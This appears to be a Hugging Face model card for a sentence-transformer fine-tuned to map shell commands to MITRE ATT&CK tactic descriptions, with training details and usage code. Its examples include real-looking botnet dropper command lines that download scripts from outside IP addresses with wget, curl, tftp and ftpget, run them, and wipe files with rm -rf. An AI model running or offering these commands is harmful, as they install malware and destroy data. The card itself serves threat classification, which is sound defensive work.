metadata
tags:
- sentence-transformers
- sentence-similarity
- feature-extraction
- generated_from_trainer
- dataset_size:212
- loss:CosineSimilarityLoss
base_model: sentence-transformers/all-mpnet-base-v2
widget:
- source_sentence: sh; enable; system; shell; /bin/busybox
sentences:
- >-
Defense Evasion: The adversary is trying to avoid being detected.
Defense Evasion consists of techniques that adversaries use to avoid
detection throughout their compromise. Techniques used for defense
evasion include uninstalling/disabling security software or
obfuscating/encrypting data and scripts. Adversaries also leverage and
abuse trusted processes to hide and masquerade their malware. Other
tactics’ techniques are cross-listed here when those techniques include
the added benefit of subverting defenses.
- >-
Defense Evasion: The adversary is trying to avoid being detected.
Defense Evasion consists of techniques that adversaries use to avoid
detection throughout their compromise. Techniques used for defense
evasion include uninstalling/disabling security software or
obfuscating/encrypting data and scripts. Adversaries also leverage and
abuse trusted processes to hide and masquerade their malware. Other
tactics’ techniques are cross-listed here when those techniques include
the added benefit of subverting defenses.
- >-
Lateral Movement: The adversary is trying to move through your
environment.
Lateral Movement consists of techniques that adversaries use to enter
and control remote systems on a network. Following through on their
primary objective often requires exploring the network to find their
target and subsequently gaining access to it. Reaching their objective
often involves pivoting through multiple systems and accounts to gain.
Adversaries might install their own remote access tools to accomplish
Lateral Movement or use legitimate credentials with native network and
operating system tools, which may be stealthier.
- source_sentence: enable; ; system; ; shell; ; SH; ; /bin/busybox
sentences:
- >-
Persistence: The adversary is trying to maintain their foothold.
Persistence consists of techniques that adversaries use to keep access
to systems across restarts, changed credentials, and other interruptions
that could cut off their access. Techniques used for persistence include
any access, action, or configuration changes that let them maintain
their foothold on systems, such as replacing or hijacking legitimate
code or adding startup code.
- >-
Privilege Escalation: The adversary is trying to gain higher-level
permissions.
Privilege Escalation consists of techniques that adversaries use to gain
higher-level permissions on a system or network. Adversaries can often
enter and explore a network with unprivileged access but require
elevated permissions to follow through on their objectives. Common
approaches are to take advantage of system weaknesses,
misconfigurations, and vulnerabilities. Examples of elevated access
include:
* SYSTEM/root level
* local administrator
* user account with admin-like access
* user accounts with access to specific system or perform specific
function
These techniques often overlap with Persistence techniques, as OS
features that let an adversary persist can execute in an elevated
context.
- >-
Defense Evasion: The adversary is trying to avoid being detected.
Defense Evasion consists of techniques that adversaries use to avoid
detection throughout their compromise. Techniques used for defense
evasion include uninstalling/disabling security software or
obfuscating/encrypting data and scripts. Adversaries also leverage and
abuse trusted processes to hide and masquerade their malware. Other
tactics’ techniques are cross-listed here when those techniques include
the added benefit of subverting defenses.
- source_sentence: zlxx; enable; ; system; ; shell; ; sh; ; /bin/busybox
sentences:
- >-
Defense Evasion: The adversary is trying to avoid being detected.
Defense Evasion consists of techniques that adversaries use to avoid
detection throughout their compromise. Techniques used for defense
evasion include uninstalling/disabling security software or
obfuscating/encrypting data and scripts. Adversaries also leverage and
abuse trusted processes to hide and masquerade their malware. Other
tactics’ techniques are cross-listed here when those techniques include
the added benefit of subverting defenses.
- >-
Execution: The adversary is trying to run malicious code.
Execution consists of techniques that result in adversary-controlled
code running on a local or remote system. Techniques that run malicious
code are often paired with techniques from all other tactics to achieve
broader goals, like exploring a network or stealing data. For example,
an adversary might use a remote access tool to run a PowerShell script
that does Remote System Discovery.
- >-
Persistence: The adversary is trying to maintain their foothold.
Persistence consists of techniques that adversaries use to keep access
to systems across restarts, changed credentials, and other interruptions
that could cut off their access. Techniques used for persistence include
any access, action, or configuration changes that let them maintain
their foothold on systems, such as replacing or hijacking legitimate
code or adding startup code.
- source_sentence: >-
cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; wget
http://89.110.99.68/bot; chmod 777 *; ./bot; cd /tmp; cd /var/run; cd
/mnt; cd /root; cd /; wget http://89.110.99.68/bot; chmod 777 *; ./bot
sentences:
- >-
Resource Development: The adversary is trying to establish resources
they can use to support operations.
Resource Development consists of techniques that involve adversaries
creating, purchasing, or compromising/stealing resources that can be
used to support targeting. Such resources include infrastructure,
accounts, or capabilities. These resources can be leveraged by the
adversary to aid in other phases of the adversary lifecycle, such as
using purchased domains to support Command and Control, email accounts
for phishing as a part of Initial Access, or stealing code signing
certificates to help with Defense Evasion.
- >-
Privilege Escalation: The adversary is trying to gain higher-level
permissions.
Privilege Escalation consists of techniques that adversaries use to gain
higher-level permissions on a system or network. Adversaries can often
enter and explore a network with unprivileged access but require
elevated permissions to follow through on their objectives. Common
approaches are to take advantage of system weaknesses,
misconfigurations, and vulnerabilities. Examples of elevated access
include:
* SYSTEM/root level
* local administrator
* user account with admin-like access
* user accounts with access to specific system or perform specific
function
These techniques often overlap with Persistence techniques, as OS
features that let an adversary persist can execute in an elevated
context.
- >-
Execution: The adversary is trying to run malicious code.
Execution consists of techniques that result in adversary-controlled
code running on a local or remote system. Techniques that run malicious
code are often paired with techniques from all other tactics to achieve
broader goals, like exploring a network or stealing data. For example,
an adversary might use a remote access tool to run a PowerShell script
that does Remote System Discovery.
- source_sentence: >-
cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; wget
http://74.48.108.226/phantom.sh; chmod 777 phantom.sh; sh phantom.sh;
chmod 777 phantom.sh; sh phantom.sh; chmod 777 phantom2.sh; sh
phantom2.sh; sh phantom1.sh; rm -rf phantom.sh phantom.sh phantom2.sh
phantom1.sh; rm -rf *; curl -O http://74.48.108.226/phantom.sh; tftp
74.48.108.226 -c get phantom.sh; tftp -r phantom2.sh -g 74.48.108.226;
ftpget -v -u anonymous -p anonymous -P 21 74.48.108.226 phantom1.sh
phantom1.sh
sentences:
- >-
Reconnaissance: The adversary is trying to gather information they can
use to plan future operations.
Reconnaissance consists of techniques that involve adversaries actively
or passively gathering information that can be used to support
targeting. Such information may include details of the victim
organization, infrastructure, or staff/personnel. This information can
be leveraged by the adversary to aid in other phases of the adversary
lifecycle, such as using gathered information to plan and execute
Initial Access, to scope and prioritize post-compromise objectives, or
to drive and lead further Reconnaissance efforts.
- >-
Reconnaissance: The adversary is trying to gather information they can
use to plan future operations.
Reconnaissance consists of techniques that involve adversaries actively
or passively gathering information that can be used to support
targeting. Such information may include details of the victim
organization, infrastructure, or staff/personnel. This information can
be leveraged by the adversary to aid in other phases of the adversary
lifecycle, such as using gathered information to plan and execute
Initial Access, to scope and prioritize post-compromise objectives, or
to drive and lead further Reconnaissance efforts.
- >-
Privilege Escalation: The adversary is trying to gain higher-level
permissions.
Privilege Escalation consists of techniques that adversaries use to gain
higher-level permissions on a system or network. Adversaries can often
enter and explore a network with unprivileged access but require
elevated permissions to follow through on their objectives. Common
approaches are to take advantage of system weaknesses,
misconfigurations, and vulnerabilities. Examples of elevated access
include:
* SYSTEM/root level
* local administrator
* user account with admin-like access
* user accounts with access to specific system or perform specific
function
These techniques often overlap with Persistence techniques, as OS
features that let an adversary persist can execute in an elevated
context.
pipeline_tag: sentence-similarity
library_name: sentence-transformers
SentenceTransformer based on sentence-transformers/all-mpnet-base-v2
This is a sentence-transformers model fine-tuned from sentence-transformers/all-mpnet-base-v2. It maps sentences and paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
Model Details
Model Description
- Model Type: Sentence Transformer
- Base model: sentence-transformers/all-mpnet-base-v2
- Maximum Sequence Length: 384 tokens
- Output Dimensionality: 768 dimensions
- Similarity Function: Cosine Similarity
Model Sources
- Documentation: Sentence Transformers Documentation
- Repository: Sentence Transformers on GitHub
- Hugging Face: Sentence Transformers on Hugging Face
Full Model Architecture
SentenceTransformer(
(0): Transformer({'max_seq_length': 384, 'do_lower_case': False}) with Transformer model: MPNetModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
(2): Normalize()
)
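The Pooling and Normalize modules listed above can be illustrated with a minimal pure-Python sketch. It assumes token embeddings arrive as plain lists and that padding is marked by an attention mask; the function names `mean_pool` and `l2_normalize` and the toy 3-dimensional vectors are hypothetical and not part of the library.

```python
import math

def mean_pool(token_embeddings, attention_mask):
    """Average the token vectors whose mask entry is 1; padding tokens are skipped."""
    dim = len(token_embeddings[0])
    total = [0.0] * dim
    count = 0
    for vector, keep in zip(token_embeddings, attention_mask):
        if keep:
            count += 1
            for i, value in enumerate(vector):
                total[i] += value
    count = max(count, 1)  # guard against an all-padding input
    return [value / count for value in total]

def l2_normalize(vector, eps=1e-12):
    """Scale a vector to unit length, as a Normalize step would."""
    norm = math.sqrt(sum(v * v for v in vector))
    return [v / max(norm, eps) for v in vector]

# Toy input: two real tokens and one padding token (illustrative values only).
tokens = [[1.0, 2.0, 2.0], [3.0, 0.0, 2.0], [9.0, 9.0, 9.0]]
mask = [1, 1, 0]

pooled = mean_pool(tokens, mask)
sentence_embedding = l2_normalize(pooled)
print(pooled)
print(sentence_embedding)
```

Because the final vector has unit length, the cosine similarity between two such embeddings reduces to their dot product.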
Usage
Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
pip install -U sentence-transformers
Then you can load this model and run inference.
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("cebollet/fine-tuned-mitre-model")
# Run inference
sentences = [
'cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; wget http://74.48.108.226/phantom.sh; chmod 777 phantom.sh; sh phantom.sh; chmod 777 phantom.sh; sh phantom.sh; chmod 777 phantom2.sh; sh phantom2.sh; sh phantom1.sh; rm -rf phantom.sh phantom.sh phantom2.sh phantom1.sh; rm -rf *; curl -O http://74.48.108.226/phantom.sh; tftp 74.48.108.226 -c get phantom.sh; tftp -r phantom2.sh -g 74.48.108.226; ftpget -v -u anonymous -p anonymous -P 21 74.48.108.226 phantom1.sh phantom1.sh',
'Reconnaissance: The adversary is trying to gather information they can use to plan future operations.\n\nReconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. Such information may include details of the victim organization, infrastructure, or staff/personnel. This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to plan and execute Initial Access, to scope and prioritize post-compromise objectives, or to drive and lead further Reconnaissance efforts.',
'Privilege Escalation: The adversary is trying to gain higher-level permissions.\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include: \n\n* SYSTEM/root level\n* local administrator\n* user account with admin-like access \n* user accounts with access to specific system or perform specific function\n\nThese techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context. ',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
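One way to use the similarity scores is to rank candidate tactic descriptions against a command string. The helper below is a sketch under stated assumptions: `rank_candidates` is a hypothetical name, and the scores are made-up placeholders rather than real model output.

```python
def rank_candidates(scores, labels):
    """Return (label, score) pairs sorted from most to least similar."""
    if len(scores) != len(labels):
        raise ValueError("scores and labels must have the same length")
    return sorted(zip(labels, scores), key=lambda pair: pair[1], reverse=True)

# Placeholder scores for illustration only; they are NOT produced by the model.
example_labels = ["Reconnaissance", "Privilege Escalation"]
example_scores = [0.12, 0.81]

ranking = rank_candidates(example_scores, example_labels)
print(ranking[0][0])  # label with the highest score
```

With the inference snippet above, the first row of the similarity matrix compares the command with each description, so `similarities[0, 1:].tolist()` could be passed as `scores`.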
Training Details
Training Dataset
Unnamed Dataset
- Size: 212 training samples
- Columns: sentence_0, sentence_1, and label
- Approximate statistics based on the first 212 samples:

| | sentence_0 | sentence_1 | label |
|---|---|---|---|
| type | string | string | float |
| details | min: 4 tokens, mean: 65.7 tokens, max: 384 tokens | min: 82 tokens, mean: 103.74 tokens, max: 153 tokens | min: 0.0, mean: 0.5, max: 1.0 |
- Samples:

| sentence_0 | sentence_1 | label |
|---|---|---|
| sh; enable; klv1234; system; shell; echo "string" | Initial Access: The adversary is trying to get into your network.<br>Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords. | 0.0 |
| sh; ping; sh; enable; system; shell; linuxshell; /bin/busybox | Lateral Movement: The adversary is trying to move through your environment.<br>Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain. Adversaries might install their own remote access tools to accomplish Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier. | 0.0 |
| enable; ; linuxshell; ; system; ; sh; ; /bin/busybox | Privilege Escalation: The adversary is trying to gain higher-level permissions.<br>Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include:<br>* SYSTEM/root level<br>* local administrator<br>* user account with admin-like access<br>* user accounts with access to specific system or perform specific function<br>These techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context. | 1.0 |

- Loss: CosineSimilarityLoss with these parameters: { "loss_fct": "torch.nn.modules.loss.MSELoss" }
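The training objective named above, CosineSimilarityLoss with an MSE `loss_fct`, compares the cosine similarity of each sentence pair with its float label. The following is a minimal pure-Python sketch of that idea, not the library's implementation; the function names and the 2-dimensional toy vectors are assumptions made for illustration.

```python
import math

def cosine_similarity(u, v):
    """Cosine of the angle between two non-zero vectors."""
    dot = sum(a * b for a, b in zip(u, v))
    norm_u = math.sqrt(sum(a * a for a in u))
    norm_v = math.sqrt(sum(b * b for b in v))
    return dot / (norm_u * norm_v)

def cosine_similarity_mse(pairs, labels):
    """Mean squared error between pairwise cosine similarity and the target labels."""
    errors = [(cosine_similarity(u, v) - y) ** 2 for (u, v), y in zip(pairs, labels)]
    return sum(errors) / len(errors)

# Toy embedding pairs (illustrative values): one identical pair, one orthogonal pair.
pairs = [([1.0, 0.0], [1.0, 0.0]), ([1.0, 0.0], [0.0, 1.0])]

matching_loss = cosine_similarity_mse(pairs, [1.0, 0.0])    # labels agree with the geometry
mismatched_loss = cosine_similarity_mse(pairs, [0.0, 1.0])  # labels contradict the geometry
print(matching_loss, mismatched_loss)
```

In this dataset the labels range from 0.0 to 1.0, so a command paired with its matching tactic description is pushed toward similarity 1.0 and a mismatched pair toward 0.0.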
Training Hyperparameters
Non-Default Hyperparameters
- per_device_train_batch_size: 4
- per_device_eval_batch_size: 4
- num_train_epochs: 10
- multi_dataset_batch_sampler: round_robin
All Hyperparameters
- overwrite_output_dir: False
- do_predict: False
- eval_strategy: no
- prediction_loss_only: True
- per_device_train_batch_size: 4
- per_device_eval_batch_size: 4
- per_gpu_train_batch_size: None
- per_gpu_eval_batch_size: None
- gradient_accumulation_steps: 1
- eval_accumulation_steps: None
- torch_empty_cache_steps: None
- learning_rate: 5e-05
- weight_decay: 0.0
- adam_beta1: 0.9
- adam_beta2: 0.999
- adam_epsilon: 1e-08
- max_grad_norm: 1
- num_train_epochs: 10
- max_steps: -1
- lr_scheduler_type: linear
- lr_scheduler_kwargs: {}
- warmup_ratio: 0.0
- warmup_steps: 0
- log_level: passive
- log_level_replica: warning
- log_on_each_node: True
- logging_nan_inf_filter: True
- save_safetensors: True
- save_on_each_node: False
- save_only_model: False
- restore_callback_states_from_checkpoint: False
- no_cuda: False
- use_cpu: False
- use_mps_device: False
- seed: 42
- data_seed: None
- jit_mode_eval: False
- use_ipex: False
- bf16: False
- fp16: False
- fp16_opt_level: O1
- half_precision_backend: auto
- bf16_full_eval: False
- fp16_full_eval: False
- tf32: None
- local_rank: 0
- ddp_backend: None
- tpu_num_cores: None
- tpu_metrics_debug: False
- debug: []
- dataloader_drop_last: False
- dataloader_num_workers: 0
- dataloader_prefetch_factor: None
- past_index: -1
- disable_tqdm: False
- remove_unused_columns: True
- label_names: None
- load_best_model_at_end: False
- ignore_data_skip: False
- fsdp: []
- fsdp_min_num_params: 0
- fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- fsdp_transformer_layer_cls_to_wrap: None
- accelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- deepspeed: None
- label_smoothing_factor: 0.0
- optim: adamw_torch
- optim_args: None
- adafactor: False
- group_by_length: False
- length_column_name: length
- ddp_find_unused_parameters: None
- ddp_bucket_cap_mb: None
- ddp_broadcast_buffers: False
- dataloader_pin_memory: True
- dataloader_persistent_workers: False
- skip_memory_metrics: True
- use_legacy_prediction_loop: False
- push_to_hub: False
- resume_from_checkpoint: None
- hub_model_id: None
- hub_strategy: every_save
- hub_private_repo: None
- hub_always_push: False
- gradient_checkpointing: False
- gradient_checkpointing_kwargs: None
- include_inputs_for_metrics: False
- include_for_metrics: []
- eval_do_concat_batches: True
- fp16_backend: auto
- push_to_hub_model_id: None
- push_to_hub_organization: None
- mp_parameters:
- auto_find_batch_size: False
- full_determinism: False
- torchdynamo: None
- ray_scope: last
- ddp_timeout: 1800
- torch_compile: False
- torch_compile_backend: None
- torch_compile_mode: None
- include_tokens_per_second: False
- include_num_input_tokens_seen: False
- neftune_noise_alpha: None
- optim_target_modules: None
- batch_eval_metrics: False
- eval_on_start: False
- use_liger_kernel: False
- eval_use_gather_object: False
- average_tokens_across_devices: False
- prompts: None
- batch_sampler: batch_sampler
- multi_dataset_batch_sampler: round_robin
Training Logs
| Epoch | Step | Training Loss |
|---|---|---|
| 9.4340 | 500 | 0.0526 |
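The fractional epoch in the log row follows from the dataset size and batch size reported in this card. The arithmetic below is a sketch that assumes training on a single device; gradient_accumulation_steps of 1 and dataloader_drop_last of False are taken from the hyperparameter list.

```python
import math

num_samples = 212   # training samples reported in this card
batch_size = 4      # per_device_train_batch_size
num_epochs = 10     # num_train_epochs
logged_step = 500   # step shown in the training log

# Assumption: one device, so the per-device batch size is the effective batch size.
steps_per_epoch = math.ceil(num_samples / batch_size)
total_steps = steps_per_epoch * num_epochs
epoch_at_log = logged_step / steps_per_epoch

print(steps_per_epoch, total_steps, round(epoch_at_log, 4))
```

Under these assumptions a full run has 530 optimizer steps, so step 500 falls in the tenth epoch, which matches the logged epoch value of 9.4340.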
Framework Versions
- Python: 3.11.13
- Sentence Transformers: 4.1.0
- Transformers: 4.52.4
- PyTorch: 2.6.0+cu124
- Accelerate: 1.7.0
- Datasets: 2.14.4
- Tokenizers: 0.21.1
Citation
BibTeX
Sentence Transformers
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}